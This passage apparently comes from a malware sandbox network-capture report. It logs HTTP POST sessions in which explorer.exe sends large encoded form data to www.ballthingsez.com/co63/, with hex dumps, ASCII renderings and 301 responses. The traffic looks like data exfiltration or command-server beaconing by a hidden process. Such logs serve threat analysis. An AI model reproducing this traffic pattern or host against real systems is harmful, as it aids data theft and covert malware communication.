                                                      Data Ascii: aJElwV=VD1K5pTBtz3siJbzeLb_GP(SFxefP7xhkeV5pwM9VTVv9vk5p4kvOzov0bphvMuL(0aHGk(dbXPs1H469lxW5zNdbMm48BZjFaAE(3qO1oFXhPf22KZ64ekhSjbS1rfwlg~4PtIrF_GCth4lAFjq0J(jXKJ5OIMomblS7i9aqPCsseeqkCJeRsYzGVLJNXfYRu632S0kbUoBYhghP63Qm5K_K8lCDE34JSFnSaqiSPoFN2hj1M1HE-PaKJj6WIpAPI5n(3yL9SzZSUcLvF(tICmyb_OPQ87Hw6N3EEGzqi(5UbDB(keKrrOQ3xHmYwWLm25eSQOj~cAVeS1lZLdXp3sDfcO1NsD5HqXr1D0_gHmiJRg5OaQaC0OzBvu7NIlmnaXaFyU28objQ1JA4GnF8dV9b37RkLvwCqDOJziDILfJGAN5Aa7BpVswExM9C6P4NNNWuT499uZ5(WVNr8YS5sToz0XQx1tCNtm9aZ50yfI5GqZ3Qas9hDtv(lA85DuCLEMAwwt_KYwUPUdlrugVm3PJN3TwY3OKewbse7c7~2ETfVBuCSBWbfqkoLPCgbyIvcn8O4KUA5EdSgaxv6Y80tY6Bvg4C5zeYJBlcrzXttIsPP8fhtmmbaMT7jVDfzz_86Tg(fF1EIzHOz(r~nnXq1yWPrkjvAwimn3z8JqJt6nTGZJ-5lV0E9zc0tDCMi9XTA(D90H-LI8Zd8b8R7JHR8d3r7Q8RbM1SCGonDEKxPh6j9CCrcMdIfCn2ag1f2omdgRptBLXA9YqCWdQIFx642uSA65MlPbnZVNvgHaLWie_GWunImy5D2dVGfgeITTeAl0x1gD_LaqpvZdAGQUu3Qm8UQdNl6XbGWJ1PP2nmHQyUOTg8rsUXYgl~50HbxUAQKzwnPZSbEtRoajiyucT1fcfWNRMRbGc673j1GLayPk48j7C4udbaxr_2SAPkdBUbQLF1I1upXeo2uXG~ItPYFQ-Gub3RAQx0l(n93aCMqOZ5VFKYNTOBXgSR-MYr70DMICeTODfd-YsjiG5KWkipbjGGhQP4aYGwt7GLlZGbgUztA2NWmDisZ8yeM6R9Ba5d4(O0GfwZJHDJ8qpe4s8J-jDpHCbFHW06W6K0KULpqIz0dvMj1FFKPgDdqItz0uI(JOj6jgmJpLEzo502E6GnX366-sCYi5veXTgZ6ugVLhBgYxoZs4xu-cXSKu4~iToKrj3pWS0YnGmIUoIeyCwHsTRmPqcDrI0TJ~o6WGyYDG7Ny9r9O557NkvhY3zA3CtoU6SVl4tFvWdBJTuuNyhbRn387N79Y3wwCna5ink8_lmLTcELoHJhq~MxrBDY1IKQeN0j76H~IDGoQ(hLyO1(q(wtJnvyOMkQsWnwq4pbwFfny7mGogsCnftHTZkT0CDXL7MvwAhstlEHDjefT302EfEqWODQQrx9ozrXYVaje5UDRoJmv9dBdu66ZbQJR0fPA).RLlYrZj
                                                      Jul 20, 2023 11:45:13.437289000 CEST365INHTTP/1.1 301 Moved Permanently
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Date: Thu, 20 Jul 2023 09:45:13 GMT
                                                      Location: https://www.ballthingsez.com/co63/
                                                      Server: Apache
                                                      Content-Length: 242
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 61 6c 6c 74 68 69 6e 67 73 65 7a 2e 63 6f 6d 2f 63 6f 36 33 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.ballthingsez.com/co63/">here</a>.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      8192.168.2.549719152.199.21.17580C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:45:13.409661055 CEST339OUTPOST /co63/ HTTP/1.1
                                                      Host: www.ballthingsez.com
                                                      Connection: close
                                                      Content-Length: 151296
                                                      Cache-Control: no-cache
                                                      Origin: http://www.ballthingsez.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.ballthingsez.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Data Raw: 61 4a 45 6c 77 56 3d 56 44 31 4b 35 71 44 5f 39 54 36 79 30 37 50 2d 61 39 65 7a 4d 4f 50 36 43 44 61 57 55 4c 35 65 6e 4f 31 66 70 7a 55 35 66 43 46 39 73 62 59 35 39 4f 51 6f 4a 54 6f 6f 79 62 70 69 34 38 69 6a 38 69 65 31 47 6c 4b 49 62 58 48 6a 7e 47 6f 31 71 51 63 57 31 44 42 78 48 38 7a 75 34 46 78 67 4c 59 38 59 30 6d 69 4f 6f 71 6c 56 76 39 48 58 30 62 6c 49 7a 65 34 6e 4b 79 44 62 75 4a 57 6b 6c 43 53 30 49 73 70 30 42 36 71 46 68 6b 4e 72 53 57 50 6d 72 4e 66 67 63 74 41 77 4f 76 55 38 68 5a 4d 48 6c 79 30 41 70 50 32 79 6e 73 6e 66 6b 44 39 72 4c 66 77 67 4e 30 50 63 50 69 62 49 47 4e 32 33 7a 69 4d 30 50 6c 30 48 64 69 6f 35 4d 6f 65 6f 67 4b 53 46 4e 2d 38 4b 48 55 58 5f 49 55 51 71 59 65 62 63 66 71 63 43 46 42 64 4c 30 73 78 32 66 4f 28 6e 51 36 44 56 57 63 5a 64 4d 4b 64 56 69 47 76 7a 78 46 7a 46 5a 68 6f 5f 73 6d 54 6c 49 79 58 56 63 38 75 4d 56 76 7a 41 78 35 31 6e 4a 45 4c 33 35 79 33 50 65 36 44 35 28 6b 61 43 71 49 54 72 75 78 48 6b 53 56 7e 37 6d 79 64 65 53 56 7a 34 7e 74 51 56 65 7a 46 36 52 6f 6c 49 6d 58 73 41 46 4d 65 45 62 65 47 37 48 75 7a 46 76 53 4d 5f 68 42 4f 69 4e 78 51 36 49 71 51 61 4c 55 4f 31 42 76 75 6a 4e 49 6b 74 6e 63 72 47 58 44 51 32 36 6f 50 68 43 77 64 4b 70 67 47 30 33 64 56 35 61 43 57 45 67 49 72 49 43 73 58 64 4a 53 65 44 4d 36 37 4b 41 69 6c 31 51 76 50 41 36 55 5a 76 4e 52 45 74 43 36 44 78 4d 49 70 38 39 69 45 4f 38 75 5a 34 33 47 59 54 76 39 59 34 77 65 4b 79 78 79 57 75 68 56 70 6b 4f 4a 50 39 5a 36 5a 34 78 5a 4d 74 4a 4b 4e 42 61 49 67 78 6a 79 63 48 79 46 73 65 39 79 75 78 4b 6c 70 5f 33 55 4e 74 49 61 67 61 4f 69 78 4a 73 4b 34 37 72 55 4b 37 46 51 61 37 4f 6d 28 71 5a 44 4b 4d 66 72 6f 76 78 55 4e 61 42 46 4e 39 4c 42 6c 43 4c 75 69 31 6d 5a 6a 4d 71 5a 61 4a 6e 4c 71 36 58 34 6d 42 42 4a 4a 63 57 68 48 44 75 4f 35 72 6a 63 31 48 5a 62 42 49 45 35 62 38 52 4c 5a 46 57 6f 58 6d 36 4f 38 52 58 39 64 66 68 39 37 47 65 6f 45 63 7a 6d 56 71 47 47 37 66 6e 50 33 32 79 59 74 38 41 59 37 69 62 78 75 49 33 33 53 78 73 32 4b 33 4b 37 35 42 6f 41 59 48 72 6c 33 49 78 4f 48 68 37 70 62 75 4f 70 39 63 77 30 6c 69 45 64 54 2d 6a 4c 50 5f 54 67 78 50 53 67 62 57 31 32 48 7a 4b 70 70 68 51 50 32 48 65 72 74 6b 51 4f 4e 4f 70 6f 34 30 52 4c 39 52 53 43 4f 73 37 69 6b 61 79 4d 46 36 6e 2d 61 64 71 37 59 42 4b 76 43 6e 77 61 68 32 62 32 6b 48 64 6a 74 70 75 46 54 58 52 2d 30 53 43 57 64 61 42 6b 46 4f 37 47 75 6c 44 37 30 4d 6c 4d 44 79 5a 57 68 56 6e 48 6d 39 53 6c 61 38 56 57 75 6a 4b 79 47 2d 44 33 68 48 47 66 73 42 48 79 6a 68 41 56 39 63 7e 77 44 5f 44 35 47 44 72 74 59 49 44 54 6f 71 72 67 47 57 4e 67 42 54 34 37 61 6e 4f 32 78 7a 51 66 53 6e 74 69 30 49 49 5f 48 57 39 62 6b 70 58 5f 6b 34 6d 49 38 41 55 31 6b 64 44 76 4c 77 33 76 31 37 51 69 42 4f 6d 4b 6a 4d 78 66 45 75 33 63 59 36 52 4e 78 50 52 4a 43 58 7e 4c 33 47 31 6d 65 4e 39 74 59 6d 30 52 4f 42 77 5f 42 54 61 51 44 38 78 6d 59 45 39 59 70 79 64 6d 44 4a 39 71 46 67 69 44 4f 33 77 64 6a 4d 74 4c 51 72 62 6e 51 64 41 4f 76 65 54 42 59 68 37 33 54 48 37 46 4f 6a 4f 50 7e 34 70 45 39 59 62 50 6e 6c 4e 67 6f 4a 57 63 68 67 37 71 51 49 42 66 7e 6d 61 59 28 38 62 74 34 46 67 78 4b 4a 45 32 41 4b 6e 38 4c 79 45 52 45 75 28 66 49 6d 39 2d 61 4e 4a 56 67 75 56 54 34 4f 72 52 6a 4d 49 6d 76 42 38 4f 77 43 4c 75 58 35 6a 77 43 38 52 70 66 74 39 55 69 6c 59 72 48 6d 4c 74 66 61 56 65 4e 61 50 4d 7a 61 6f 58 71 44 53 30 43 41 36 54 57 65 30 71 38 4c 39 36 34 7a 79 36 7a 4d 72 6c 78 47 66 71 55 36 49 5a 35 58 70 77 47 45 76 38 6d 6e 37 52 45 56 4c 4a 66 67 38 71 4e 6c 75 53 75 35 78 30 33 57 31 71 5a 41 56 30 5a 4b 53 31 7a 78 52 4b 69 79 56 59 46 76 6f 71 78 5a 53 4a 55 53 73 59 4d 36 62 6f 36 6f 77 43 47 56 63 74 7a 64 33 56 48 4d 47 58 72 2d 47 69 67 70 52 54 58 4c 4b 50 37 78 6e 63 4c 38 57 34 67 31 41 35 7e 47 32 46 47 78 64 43 75 63 4a 44 55 53 35 36 46 37 6d 4f 4d 61 6a 50 50 77 41 33 4b 55 68 6b 69 45 4c 58 4a 58 4b 4e 75 5f 53 49 79 4f 7e 63 4b 42 54 6b 6a 58 79 34 39 4c 32 72 44 6e 39 48 6a 50 77 51 62 69 37 2d 73 62 49 79 30 6a 42 76 43 58 69 49 37 67 7e 72 52 42 50 48 6b 47 47 35 4a 62 76 59 47 31 35 4b 48 65
                                                      Data Ascii: aJElwV=VD1K5qD_9T6y07P-a9ezMOP6CDaWUL5enO1fpzU5fCF9sbY59OQoJTooybpi48ij8ie1GlKIbXHj~Go1qQcW1DBxH8zu4FxgLY8Y0miOoqlVv9HX0blIze4nKyDbuJWklCS0Isp0B6qFhkNrSWPmrNfgctAwOvU8hZMHly0ApP2ynsnfkD9rLfwgN0PcPibIGN23ziM0Pl0Hdio5MoeogKSFN-8KHUX_IUQqYebcfqcCFBdL0sx2fO(nQ6DVWcZdMKdViGvzxFzFZho_smTlIyXVc8uMVvzAx51nJEL35y3Pe6D5(kaCqITruxHkSV~7mydeSVz4~tQVezF6RolImXsAFMeEbeG7HuzFvSM_hBOiNxQ6IqQaLUO1BvujNIktncrGXDQ26oPhCwdKpgG03dV5aCWEgIrICsXdJSeDM67KAil1QvPA6UZvNREtC6DxMIp89iEO8uZ43GYTv9Y4weKyxyWuhVpkOJP9Z6Z4xZMtJKNBaIgxjycHyFse9yuxKlp_3UNtIagaOixJsK47rUK7FQa7Om(qZDKMfrovxUNaBFN9LBlCLui1mZjMqZaJnLq6X4mBBJJcWhHDuO5rjc1HZbBIE5b8RLZFWoXm6O8RX9dfh97GeoEczmVqGG7fnP32yYt8AY7ibxuI33Sxs2K3K75BoAYHrl3IxOHh7pbuOp9cw0liEdT-jLP_TgxPSgbW12HzKpphQP2HertkQONOpo40RL9RSCOs7ikayMF6n-adq7YBKvCnwah2b2kHdjtpuFTXR-0SCWdaBkFO7GulD70MlMDyZWhVnHm9Sla8VWujKyG-D3hHGfsBHyjhAV9c~wD_D5GDrtYIDToqrgGWNgBT47anO2xzQfSnti0II_HW9bkpX_k4mI8AU1kdDvLw3v17QiBOmKjMxfEu3cY6RNxPRJCX~L3G1meN9tYm0ROBw_BTaQD8xmYE9YpydmDJ9qFgiDO3wdjMtLQrbnQdAOveTBYh73TH7FOjOP~4pE9YbPnlNgoJWchg7qQIBf~maY(8bt4FgxKJE2AKn8LyEREu(fIm9-aNJVguVT4OrRjMImvB8OwCLuX5jwC8Rpft9UilYrHmLtfaVeNaPMzaoXqDS0CA6TWe0q8L964zy6zMrlxGfqU6IZ5XpwGEv8mn7REVLJfg8qNluSu5x03W1qZAV0ZKS1zxRKiyVYFvoqxZSJUSsYM6bo6owCGVctzd3VHMGXr-GigpRTXLKP7xncL8W4g1A5~G2FGxdCucJDUS56F7mOMajPPwA3KUhkiELXJXKNu_SIyO~cKBTkjXy49L2rDn9HjPwQbi7-sbIy0jBvCXiI7g~rRBPHkGG5JbvYG15KHepVv9eBGm6tTSmq7cw-kkd9Sm8LMNe1ZtozHmL6l8CzvoWDxcM2v-B5burwxx6fVvPTjkBi(OhWvDjCe8SVPY~avjXY9di5g4EApk8eNRJMztvbTOPlxvX_~iWvmO0HGu7fJNQrZxoiYkYSObfec5nFfxbUX5Jt8MLZMwKytSsEwQWTAuyZ08mWMLs8RiOKm9~V4v08U_VHGq5N0trEsFY919u8UDSBYL7XLb17ciYWr6zB6gXMRcNh5WJ6KmfuOANYySsNUxKCC4eevL6NzHEvqheQESh8Gi519cjD74a0n01mbKjtoXwlc3~Au_(7eDP2ky~m2MBHvOrOwWgdjmy36l4bQtUmxTxP3XUVNHeSpFDzKKHkOmrLyTnrj-Xsjslf2n2IEWMVytB9L_LKN_PiNpcIs_rnyoFkJgq3Lem4BD1UIcUpNcXSvwZAXwY3Z5MmZ5GjVJ9n4ffdYFT9Li36fH0f0QTR5WXGKQxBYIjWMzik1bD3I4YMXa1fjXlaKNnZsExSGbvy5aXE2dMhLEmLz7R3zqmruwvOf4bSXZPZxRDOHaLbK8Uqv6SurL4_xrXee7PEeYQFFu0-g2mN21~NzhUt0FlAYf1ngekggyThtBxSDfxH(eAEKvxkZB6aexpQdlbocXDyFaa3E0GRot4RmPfwUDlWSM7sg_qbDgKHwUNvdt34uamtgiuHcagGS0iq~lM6zt6fB_OQsHnPWmHqoQobp8RGj6(OUZu2wetl9eekTG(3YPlzyQ9RC6Y3Y5iQ6Oi4izXBbP8pXOlJ21VUabtKhGvaOFSkBaWpWShIh9tyfP5Z35URllcn3Bny5raqnKSq8mYZORa7YzuZNjvas3QCiyZvmkj8YftSK2a8xdorITJEoX5vzHr54lMUpndQ0eLdrxPzHb4u0Q2ppzs8FSTCfgxUNJt9K5OoFBDG9C8-Xc3fyeEIbYJCKyh8oTt40K6dWZ2f3iVvl1wGFB1BrhurGLJCZunzYwN9GbsId8sMTR51FrKooQ7XkXwn3qETJh3nKIfNh11J5RM-m3VA3sVsdMhIUZ8XrtHFXwxvfiq28JxXrTJqnL7M~XNpPHVAWG4QKDvDeCFJpx5B(_pTL573duVBkgdL8r3VvSS4qrVEfTDGsOjE(8dACJDvJclAga7afXMwGfZN8MkK3_nqVTHK3NTz4CG3WnGj0ssYngZH7ASm~e2rLfuN3Hb7WmvauNFDnzgc86wosi42KL7haQDq8nKkCul6t1WvOVVXyJMVtnQDM1if7GTIWi2chwzWTQZDfqVszv60bUhYCz9BfTSPa9vwFi27SiOdjNAu9cl8UjOodgdi0E0GWgNpFi7rr7Pdgc4WP5WnsnhqofILEnGAxelatw39q1PEDniRWKBN8w5x87Q5i-2ovPd6gHdkJmGzUGQzNb8j3HRapHHezsygcIol~Je232oy4e05ewQcI03gWsJ-D_E1IP6g6dAHLz7g5YIcBufZUYXYcQ4dAdDxdSM_hPbYgwwUaAJSkTowCAg8E9vyZ8hy6vD_SGCU4GxRj895BKNkF32rl5XDoIFGz5xADDHJcUiFaAOJgH2wiX7nAAdjUan-oYbrjcwH~yON(GCZJFTXBXlU2b2PqDf3ixX2LiaznYeRcONOoHQ4~BFfTsHPWNx5YPxezws7jhWa8bbF76~MTm2ktgo9kztUZgWw5plYq11p9Y5yREcF(x4L90(1TFq6CwTUpG7CFhkv6w1pDZFVTjBeW5m5b4Ej75IDkSW5tSeJ0c7QyBH6sVNKbRuwy0aXctvXJnXaoC25jjKidHec9dsku1t_hnf37roxf_yXJ3yIgYprK0GT5j8XQIPK(ssx~0zjsotQtTHB1os8MeLozDq0lpw0AYa8wRhidBfWmuOy5UX4ZeCCQfl_Kz8hGY4KTW~3um5So7dNtFOhOCjForllMHKPUUROINZ2dPbwd3s797qzDhZI8aQsd7CYQf9hYNgeAHB7rp1ccGadLjMSgUNjIokiZsC-jiTjQt1CHr00YdRtOlnTAAgKLb2gv_jMgc56CDgPPdIhmZuus5jxX-FdvWeF0KenrHzOPBAcQh~Gd9B2SJuIFxp22lqgzSvoQu0GPvlGTSdeNtmb4xg5~GkM1voNFJo7lFq97VgtW06Kb4MatKugneT5R5vi~An5p09tZ0cEEbvg6_I3OXdlrreKWDJApKCwfK(x3xFFANrs1XEKuuFPtNDmXNTz0ltXHBThW24FGewSOT(SuP8DnboTzaTiM7nY0iPdz4i2HKmUK_CTQEJnuKkClA4u8zoL~WDH94wm~8HEJaswOcVhPKPXXkyURrXlcq1fyZFhpqovnNSsyLd5n8x-xpRXfuehjhB_6GZuo-t8OeVC9FS2r6C4yVnjfZu98yZQGAxD4aNi4RokhAWJP-WzHi8apzjg0Q5g0Dug0OQkIseGjgNMCGFxO99qFcQerDLu4VvRq_0GZe0wuH~LsJxpM0GIv2ui6N6PzVR91lDV5crLk4vV4TSrxq98Oorn~rxFURSkym~fOWRB2e0czBK1Lp46uLZdSh9WDPWMZywAW7yIqCJeG6~N43aW6lq8avy6h8DD7L0Ilm9qEo887uY0yaoV6VcHqdSXWKHhZt(PXPoc03L3ilSTCrp3aDkeLnf0Ao(0I-asFAucGEci8L(IOVlUEPz8wVN0IJHeCiCHFFvUN6BEDCp4rt3dJ6XrjVQybdoyE
                                                      Jul 20, 2023 11:45:13.424566031 CEST344OUTData Raw: 4d 50 34 73 6b 35 4c 71 76 6a 51 36 4e 55 69 68 46 67 58 68 59 6a 6e 4c 4f 5a 37 63 6e 37 71 5f 41 57 43 32 62 57 56 4a 53 58 6d 4c 30 44 54 79 7e 53 28 50 56 44 51 43 32 73 62 63 4c 67 75 66 4a 4b 5a 6d 65 59 6a 32 73 68 6e 78 57 43 61 30 30 47
                                                      Data Ascii: MP4sk5LqvjQ6NUihFgXhYjnLOZ7cn7q_AWC2bWVJSXmL0DTy~S(PVDQC2sbcLgufJKZmeYj2shnxWCa00Gt9unP3wt4_Zx3Y7LjBPSQY7CT-b8pSVEAcEIXJMT7FEJvCTtqRyA~P4kC8EmT0GbHsZRVPP6eOYrHXCr0z4DpwoJ15c5PECjcM4oBJeBbuCDXHyr1c2FvORs99P3PWIg05x-dgZ6WLQ8FlF2px3ahl1S4mAhqOGvq
                                                      Jul 20, 2023 11:45:13.424631119 CEST354OUTData Raw: 6a 69 44 50 65 46 30 66 75 42 6c 44 57 4e 67 74 49 68 66 44 72 48 6c 41 55 53 4c 48 38 61 4e 51 77 63 36 69 37 4c 36 32 69 39 7e 66 77 42 43 5f 31 4f 44 32 4b 52 37 4e 6c 59 79 49 62 38 43 6c 48 54 4e 72 44 4d 69 70 6c 46 6c 4b 30 50 70 37 42 65
                                                      Data Ascii: jiDPeF0fuBlDWNgtIhfDrHlAUSLH8aNQwc6i7L62i9~fwBC_1OD2KR7NlYyIb8ClHTNrDMiplFlK0Pp7BezEF3bGy002oJo0QXsf8xEdT1Dw9t5xKr0mGGnc1geqVJqJUT(kGrjqWEqeIQMZgvflt9RRTc8WWKGg1GcVJkn3AXKjnWoEDSWHPUf6z6J9RYHApLCdEIJAE_u-S9BidfpHYswvYBtq4SSpUI9oA-5fp5mRbV99hJY
                                                      Jul 20, 2023 11:45:13.424835920 CEST357OUTData Raw: 6b 39 76 68 46 35 47 34 71 6d 6f 57 59 49 53 4b 30 2d 72 39 32 71 74 32 6d 53 67 4d 5a 63 69 64 44 6a 79 74 35 72 69 31 7e 46 51 6f 47 6a 62 46 51 61 62 67 6a 47 51 39 45 6f 63 50 33 4e 59 73 76 57 78 56 50 6b 71 32 75 46 4e 38 4f 51 47 5f 73 76
                                                      Data Ascii: k9vhF5G4qmoWYISK0-r92qt2mSgMZcidDjyt5ri1~FQoGjbFQabgjGQ9EocP3NYsvWxVPkq2uFN8OQG_svVbgHiJ5hTIPodn68qVxlymdQ(g6u3fg0vgkmzWeYeIuWWKGlJdxT1CnFfxuGLTDIjyNfn45la4vQIMCXQfvmYaya30RvXvI0heZiEevRL7mwdporBJhviI9S~KdoAmOdyZzX~NbvaejEMEC8sEFJHP0-Z0E0vv~jW
                                                      Jul 20, 2023 11:45:13.424835920 CEST359OUTData Raw: 37 75 65 31 31 6d 48 4d 47 50 61 53 79 50 4f 50 77 73 48 50 6d 39 56 7a 57 66 31 4b 51 54 53 2d 66 43 71 77 76 39 4e 68 6b 37 47 77 50 61 6b 36 78 38 43 35 39 6b 67 58 53 42 6b 65 77 65 57 58 5a 59 4e 54 78 4b 7e 63 4f 41 6a 77 68 31 6f 39 76 69
                                                      Data Ascii: 7ue11mHMGPaSyPOPwsHPm9VzWf1KQTS-fCqwv9Nhk7GwPak6x8C59kgXSBkeweWXZYNTxK~cOAjwh1o9viR99C5C9EpFeAhuMZFRtPAemHTweuFnGAEC(AA-Rq8rYC0Y9l2oSHe2d7l13wNKbso6tX7hHX~1i50a4y9YWKbVc3HkrdialP(AfinMZNh7KLixfXQm02U3rn8j6YDVWFUql0dpZvLb~5AUgOy_TYrB4WN2V4r33jv
                                                      Jul 20, 2023 11:45:13.424896955 CEST362OUTData Raw: 53 44 48 33 63 4e 43 34 42 41 64 6b 66 65 33 34 47 75 67 50 57 39 67 62 51 68 36 35 78 52 62 6d 4b 75 6f 4a 44 5a 78 63 46 5f 6b 51 6e 6c 56 56 6d 6f 51 46 6f 52 51 4c 49 37 31 38 52 75 36 6a 49 53 67 77 64 5a 48 70 51 61 77 70 43 63 78 54 55 33
                                                      Data Ascii: SDH3cNC4BAdkfe34GugPW9gbQh65xRbmKuoJDZxcF_kQnlVVmoQFoRQLI718Ru6jISgwdZHpQawpCcxTU33K7e9QrHLHg5OsxWJt943UV7AtcoBynGKMll1NYRdziIhPfUjVG92g0yPctbO1MdcBzmPu~-NkEL51SlzFw6JPKlPKCeXUy0IuXG28rQjYKNIjeDv_0-IEnzqjZA2z1YGRd3EZJ9pBpSzMn_Az7flUHagED9AYMWP
                                                      Jul 20, 2023 11:45:13.424896955 CEST364OUTData Raw: 32 61 39 6c 4d 42 30 4a 79 43 4f 39 4c 56 4a 6f 6d 7a 63 59 32 6d 45 78 4c 44 7a 6d 69 4c 55 55 54 6f 74 39 77 66 44 72 7e 6e 7a 66 39 35 38 52 6a 74 52 39 56 79 45 31 58 46 71 48 71 41 31 38 66 36 75 63 59 4a 64 46 75 61 71 76 70 45 77 77 35 52
                                                      Data Ascii: 2a9lMB0JyCO9LVJomzcY2mExLDzmiLUUTot9wfDr~nzf958RjtR9VyE1XFqHqA18f6ucYJdFuaqvpEww5RjAlX9U8WcGA1lkpE99rFQ0HIX6weHA2BFHKzGa2m6TpndjamjMAvJ8vtUG9sKNB13RyMsCFBPLETAZ6UHs0G5Gntz50Rgi5ZgmgaWILKjGuVbYbtCebxtJLe1BY89sWO8zLQd8zWt8H2MX4bJDj5ChrnpMuEGdSRO
                                                      Jul 20, 2023 11:45:13.439917088 CEST375OUTData Raw: 6f 34 72 66 68 75 31 2d 68 69 75 6c 76 37 53 42 6b 72 75 56 77 76 44 6e 76 7a 6b 46 7e 6c 34 67 73 50 57 4a 71 68 58 33 36 6b 4e 34 45 61 6d 68 68 68 64 66 31 31 65 38 33 61 4c 70 4f 79 36 58 4b 74 47 51 51 2d 42 48 4b 73 49 41 76 4d 64 4d 45 6b
                                                      Data Ascii: o4rfhu1-hiulv7SBkruVwvDnvzkF~l4gsPWJqhX36kN4Eamhhhdf11e83aLpOy6XKtGQQ-BHKsIAvMdMEkey5RJ_Fce2GKtp~V(JRdIlGzv5VrPkyB7NoF3VgxO7s_mMv8KJg3ewZF7yxm2TXepRAwfE3V4H~VdOObJhKDSpDGaxj_yu80rm1538C9dWRWXIEgiSfhdYs8g7fBsr7asUsOobANzHjozH2GgCUuHLJjQAabGSkFN
                                                      Jul 20, 2023 11:45:13.439965963 CEST383OUTData Raw: 64 6b 47 6e 6a 6a 67 46 36 43 69 71 71 58 32 67 49 44 78 48 30 44 38 4a 76 6b 46 6e 4e 49 72 68 71 7a 53 69 58 4d 69 39 39 66 69 5f 4d 45 68 6a 41 6b 68 47 73 4d 67 5a 38 64 4c 73 7e 4a 5a 68 55 46 68 47 55 65 7e 50 7a 63 6f 79 43 45 50 4c 75 30
                                                      Data Ascii: dkGnjjgF6CiqqX2gIDxH0D8JvkFnNIrhqzSiXMi99fi_MEhjAkhGsMgZ8dLs~JZhUFhGUe~PzcoyCEPLu0cfyC0ednF_OE5k(_DJwVEaG_vNTfILvYltLOj43kibaOlPuGincUhuWbLJggBzgFfL0b8v44KOA5cL6iHEGpOG~2v7u4Rh18phWOJeqUYPQsd2N5XQ9SY1lcLeS0WT60vWE0FjxcwKFl5zkxWu9v6WF6pqeLJQxpD
                                                      Jul 20, 2023 11:45:13.440005064 CEST396OUTData Raw: 4a 70 53 74 36 59 4f 6d 6c 56 53 52 74 51 72 63 37 67 71 44 68 37 76 78 41 72 44 5f 5a 57 42 50 72 71 79 2d 39 47 5a 76 43 54 6c 4d 6f 49 68 71 70 50 59 47 33 68 55 61 57 4f 42 73 6f 49 76 5f 62 6b 75 4b 68 34 59 48 6b 4d 67 6f 52 51 4c 53 36 66
                                                      Data Ascii: JpSt6YOmlVSRtQrc7gqDh7vxArD_ZWBPrqy-9GZvCTlMoIhqpPYG3hUaWOBsoIv_bkuKh4YHkMgoRQLS6fVuauYERp8dlVZk3KrO9T9MqAeN3mJ5l1eECThqHey1pVgxAzKH22aC5sI_T2DEuLn4l_hCfDBDxfrNxdK0zawIZVyQS_d8yVt1SHQNFgzD2j5vTy8Ed0mYeK267zioEfzyDdOu5tovcCQRW-GQfU5dyZbZ~GDCDVM
                                                      Jul 20, 2023 11:45:13.440033913 CEST406OUTData Raw: 64 52 68 41 6d 79 51 43 4f 37 39 6d 73 4a 4f 69 42 38 42 30 78 50 4f 59 78 65 5a 77 39 69 31 4f 49 45 7e 5f 58 57 6d 6f 62 31 67 46 42 56 4c 44 46 64 46 70 4f 77 53 50 44 42 75 78 6b 58 7e 78 68 69 7a 41 65 34 46 71 75 55 31 5a 38 52 59 63 43 4b
                                                      Data Ascii: dRhAmyQCO79msJOiB8B0xPOYxeZw9i1OIE~_XWmob1gFBVLDFdFpOwSPDBuxkX~xhizAe4FquU1Z8RYcCKhE0HSiYX(HyGfpBVjnViNcyfe54zK4wEhjbP29IdN564Shw_w-qq~qpg7Kns3NG6Msrz(4wn6AB14nDJzAKMOo0VqCMHz-2EbFKjE8BdxPQJV-BbTTwAkEiURmnInq(DRy4PBiGUbLq1AzqcCugLrxc4JLqomPGui
                                                      Jul 20, 2023 11:45:13.489413977 CEST481INHTTP/1.1 301 Moved Permanently
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Date: Thu, 20 Jul 2023 09:45:13 GMT
                                                      Location: https://www.ballthingsez.com/co63/
                                                      Server: Apache
                                                      Content-Length: 242
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 61 6c 6c 74 68 69 6e 67 73 65 7a 2e 63 6f 6d 2f 63 6f 36 33 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 